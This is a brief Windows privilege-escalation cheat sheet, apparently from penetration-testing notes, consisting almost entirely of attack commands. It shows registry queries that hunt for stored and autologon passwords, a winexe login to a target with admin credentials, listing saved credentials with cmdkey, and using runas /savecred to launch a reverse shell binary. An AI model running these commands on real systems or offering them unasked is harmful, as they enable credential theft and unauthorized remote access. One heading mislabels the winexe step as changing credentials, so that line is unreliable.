# Password Inside Registry Key

* Query passwords saved inside the registry
```sh
reg query HKLM /f password /t REG_SZ /s
```
* Admin Autologon credentials
```
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
```
* On attacker, change the credentials on target
```sh
winexe -U 'admin%password' //<target-IP> cmd.exe
```

## List other Creds
```
cmdkey /list
```
* Open reverse shell
```sh
runas /savecred /user:admin C:\shell.exe
```